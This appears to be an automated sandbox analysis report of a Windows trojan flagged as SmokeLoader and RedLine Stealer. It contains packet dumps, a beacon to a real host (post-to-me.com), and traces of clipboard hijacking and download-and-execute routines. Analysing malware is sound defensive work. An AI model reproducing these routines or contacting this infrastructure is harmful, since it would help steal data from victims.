Jan 12, 2025 17:47:05.960959911 CET	448	IN	Data Raw: 49 3b 00 00 ba fe ff ff ff 39 53 0c 0f 84 52 ff ff ff 68 04 80 44 00 57 8b cb e8 61 3b 00 00 e9 1c ff ff ff 8b ff 55 8b ec 56 8b 75 08 56 e8 84 f9 ff ff 50 e8 8e 33 00 00 59 59 85 c0 74 7c e8 35 fc ff ff 83 c0 20 3b f0 75 04 33 c0 eb 0f e8 25 fc Data Ascii: I;9SRhDWa;UVuVP3YYt\|5 ;u3%@;u`3@DFuNSW<D?u S>8YuFjFXFF?~>^^N3_@[3^]U}t'VuFtVff&fY^]
Jan 12, 2025 17:47:05.960975885 CET	1236	IN	Data Raw: 0c e8 b5 ff ff ff 83 3e ff 74 06 83 7d 0c 00 7f e7 5e 5d c3 8b ff 55 8b ec f6 47 0c 40 53 56 8b f0 8b d9 74 32 83 7f 08 00 75 2c 8b 45 08 01 06 eb 2b 8a 03 ff 4d 08 8b cf e8 7d ff ff ff 43 83 3e ff 75 13 e8 38 ee ff ff 83 38 2a 75 0f 8b cf b0 3f Data Ascii: >t}^]UG@SVt2u,E+M}C>u88*u?d}^[]UxD3ES]Vu3W}ulu53PPPPPMt
Jan 12, 2025 17:47:05.960989952 CET	224	IN	Data Raw: ff ff 00 08 00 00 e9 89 00 00 00 f7 85 f0 fd ff ff 30 08 00 00 75 0a 81 8d f0 fd ff ff 00 08 00 00 8b 8d e8 fd ff ff 83 f9 ff 75 05 b9 ff ff ff 7f 83 c7 04 f7 85 f0 fd ff ff 10 08 00 00 89 bd dc fd ff ff 8b 7f fc 89 bd e4 fd ff ff 0f 84 b1 04 00 Data Ascii: 0uu;u$DXHHty+'HHt0GPhPPCtG
Jan 12, 2025 17:47:05.966073036 CET	1236	IN	Data Raw: ff ff c7 85 e0 fd ff ff 01 00 00 00 8d 85 f4 fd ff ff 89 85 e4 fd ff ff e9 35 04 00 00 8b 07 83 c7 04 89 bd dc fd ff ff 3b c6 74 3b 8b 48 04 3b ce 74 34 f7 85 f0 fd ff ff 00 08 00 00 0f bf 00 89 8d e4 fd ff ff 74 14 99 2b c2 d1 f8 c7 85 c8 fd ff Data Ascii: 5;t;H;t4t+ DP@Ypeg4itqnt(otaU7/ tf

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49707	172.67.179.207	443	4468	C:\Users\user\Desktop\NDWffRLk7z.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 16:47:04 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2025-01-12 16:47:05 UTC	806	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:47:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cAnsyi1yGbqy%2BoKt19bQeY35CHgfTFxFHWaXV44s9bqf2q7hQSpaadNdOEmhLpuWuvH9mt4LAvvMF8jQ%2F1yl%2B40vYj%2FGqbGUlE6GMbrRfl5qXEQ%2BZNbmibjlI%2FjluBKo8Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900ea057680e42d8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1761&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=728&delivery_rate=1603514&cwnd=222&unsent_bytes=0&cid=0f304b5df5edb43a&ts=431&x=0"
2025-01-12 16:47:05 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-12 16:47:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49730	104.102.49.254	443	7252	C:\Users\user\AppData\Local\Temp\89AC.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 16:47:10 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-12 16:47:10 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sun, 12 Jan 2025 16:47:10 GMT Content-Length: 25665 Connection: close Set-Cookie: sessionid=505255d87a2bf729c137c289; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-12 16:47:10 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-12 16:47:10 UTC	11186	IN	Data Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>

Target ID:	4
Start time:	11:46:59
Start date:	12/01/2025
Path:	C:\Users\user\Desktop\NDWffRLk7z.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\NDWffRLk7z.exe"
Imagebase:	0x400000
File size:	468'480 bytes
MD5 hash:	9F08D109672D30FDD700843D3518D0E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.3748774798.000000000058A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	11:47:05
Start date:	12/01/2025
Path:	C:\Users\user\AppData\Local\Temp\89AC.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\89AC.tmp.exe"
Imagebase:	0x400000
File size:	403'968 bytes
MD5 hash:	08494E6A1E788EA3259955A4524FDFEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.1601705036.0000000000793000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:47:09
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7252 -s 1656
Imagebase:	0x80000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	3.7%
Signature Coverage:	5.7%
Total number of Nodes:	759
Total number of Limit Nodes:	22

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC06: _strlen.LIBCMT ref: 0040CC1D

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
Instruction ID: 84ae510e80891b91da9cfa011cccf91080e50da4f88b7c16b45420ac6e32ace8
Opcode Fuzzy Hash: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
Instruction Fuzzy Hash: BB51F331C00384DAE711ABA4EC467AD7774FF29306F04523AE805B22B3EB789A85C75D

Function 004029EA Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A0D
InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 00402A23
GetTempPathW.KERNEL32(00000105,?), ref: 00402A3F
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A55
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A8E
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402ACA
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AE7
CloseHandle.KERNEL32(00000000), ref: 00402AFD
ShellExecuteExW.SHELL32(?), ref: 00402B5E
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B73
CloseHandle.KERNEL32(?), ref: 00402B7F
InternetCloseHandle.WININET(00000000), ref: 00402B88
InternetCloseHandle.WININET(00000000), ref: 00402B8B

Strings

ShareScreen, xrefs: 00402A08
<, xrefs: 00402B3B
.exe, xrefs: 00402A61

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
Instruction ID: 1f3e70d10a2fb6dcbdd3680cf8e7ca54fef569da526477a1452c3d554320dc38
Opcode Fuzzy Hash: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
Instruction Fuzzy Hash: 6C41847190021CAFEB209F549D85FEA77BCFF04745F0080F6A548E2190DE749E858FA4

Function 0058B42E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0058B456
Module32First.KERNEL32(00000000,00000224), ref: 0058B476

Memory Dump Source

Source File: 00000004.00000002.3748774798.000000000058A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0058A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58a000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: cecbb576d130f1f451df92241848f6eef381027ec76b6d6df998a27d766014a6
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 73F0F6315007116FFB203BF4988FB6E7AEDBF49324F100228EA52A14D1DB70EC054B61

Function 0043D02C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CCFA: CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17

GetLastError.KERNEL32 ref: 0043D140
__dosmaperr.LIBCMT ref: 0043D147
GetFileType.KERNEL32(00000000), ref: 0043D153
GetLastError.KERNEL32 ref: 0043D15D
__dosmaperr.LIBCMT ref: 0043D166
CloseHandle.KERNEL32(00000000), ref: 0043D186
CloseHandle.KERNEL32(?), ref: 0043D2D0
GetLastError.KERNEL32 ref: 0043D302
__dosmaperr.LIBCMT ref: 0043D309

Strings

H, xrefs: 0043D28E

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 76b590644e61a1e30ee63bf02a6fb5b1311e46919e71f325493a9cd527e13796
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: 09A14732E101049FDF19AF68EC917AE7BB1AF0A324F14115EE815AB3D1D7389D12CB5A

Function 00432F19 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: 8b8381e38334751f3c5fee40e88eacdf1446f1079df49a385922c4ea532b4e29
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 4CC10670E04345AFDF11DFA9D841BAEBBB0BF0D305F14519AE805A7392C7789A41CB69

Function 0211003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0211024D

Strings

kernel32.dll, xrefs: 0211008F, 02110095
cess, xrefs: 0211018D

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 74c52d792651154b35292d0624a265a8ac5351d2dd942f5d0c11e8719098d6e9
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 95525874E01229DFDB64CF58C984BA8BBB1BF09304F1580E9E94DAB351DB30AA85CF14

Function 00402BFA Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C1D

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E30
InternetCloseHandle.WININET(00000000), ref: 00402E41
InternetCloseHandle.WININET(00000000), ref: 00402E44

Strings

ShareScreen, xrefs: 00402C18
https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C4D, 00402D79, 00402DE8
&cc=DE, xrefs: 00402DAA, 00402DB0, 00402E0D

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
Instruction ID: 38c4ea95430cb0d064a2c81279cd8101482ed185274a1110c797b87c00f11b19
Opcode Fuzzy Hash: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
Instruction Fuzzy Hash: 4C517095A65344A9E320EBB0BC46B3633B8FF58712F10543BE518CB2F2E7B49944875E

Function 004051C6 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051DA
__Mtx_init.LIBCPMT ref: 00405200
std::_Cnd_initX.LIBCPMT ref: 00405223
__Thrd_start.LIBCPMT ref: 00405248
std::_Cnd_waitX.LIBCPMT ref: 00405268
std::_Cnd_initX.LIBCPMT ref: 00405295

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction ID: ef80ad8abc8d01ee6ed88eea47d540721f1d2954bb97cc6dce8e21ba99fc2e21
Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction Fuzzy Hash: EB215172C042489ADF15EBF5D8417DEB7F8AF08318F54407FE400B62C1DB7D89448A69

Function 004057F6 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 00405812
__Cnd_signal.LIBCPMT ref: 0040581E
std::_Cnd_initX.LIBCPMT ref: 00405833
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040583A

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction ID: aebd2ac95218272d728fe4b8aabd0d06745c53d3a4d3bf2acc4ab23466c53149
Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction Fuzzy Hash: 5FF082324007009BE7313772C80770A77A0AF04319F54883EF456769E2DBBEA8585A5D

Function 00402956 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00402985
__fassign.LIBCMT ref: 00402995

Part of subcall function 00402819: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC

Strings

+@, xrefs: 004029DA

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID: +@
API String ID: 2843524283-4068139069
Opcode ID: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
Instruction ID: 360ce0a8eae9c999d09f2756f3db8bce049cda3fb2da0c45bd643548fbd10a56
Opcode Fuzzy Hash: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
Instruction Fuzzy Hash: F901D6B1E0011C5ADB24EA25ED46AEF77689B41308F1401BBA605E31C1D9785E45CA99

Function 0042DFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
ExitThread.KERNEL32 ref: 0042DFCA

Strings

<(@, xrefs: 0042DFBC, 0040F1DD

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: <(@
API String ID: 1611280651-4189137628
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: e0787552ab8efb8db6d324a59155cd7370fffab00d3424d568e81b2c5b813918
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: 7EF0A471A00614AFDB04EFB1D80AA6D3B70FF09715F10056AF40257292CB7969558B68

Function 0042E104 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFB0,00000000,?,?), ref: 0042E14D
GetLastError.KERNEL32(?,?,?,?,?,0040CF04,00000000,00000000,?,?,00000000,?), ref: 0042E159
__dosmaperr.LIBCMT ref: 0042E160

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
Instruction ID: 0446f91cba5bc1877a5460ce95bae766c471c3d01d015a917539d7ef00797947
Opcode Fuzzy Hash: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
Instruction Fuzzy Hash: FF01D236600139BBDB119FA3FC05AAF7B6AEF85720F40003AF80582210DB358D21C7A9

Function 00434745 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDCB,00000000,00000002,0040DDCB,00000000,?,?,?,004347F4,00000000,00000000,0040DDCB,00000002), ref: 0043477E
GetLastError.KERNEL32(?,004347F4,00000000,00000000,0040DDCB,00000002,?,0042C151,?,00000000,00000000,00000001,?,0040DDCB,?,0042C206), ref: 00434788
__dosmaperr.LIBCMT ref: 0043478F

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: 754c6ade6be4612c7e0c4d55d151f31ddb378772f23eed9c1438f533fa7de6e2
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 92012836710114ABDB159FAADC058EE7B2AEFCA721F24020AF81597290EB74ED528794

Function 00402BA3 Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BC5
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BDD
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BED

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 504cdbf1e8d79b6d7283afc99896261950e1a919ac783b79018d19fe3f3d7e53
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: 16F0B4B650011CFFEB214F94DD89DABBA7CEB047E9F100175FA01B2150D6B19E009664

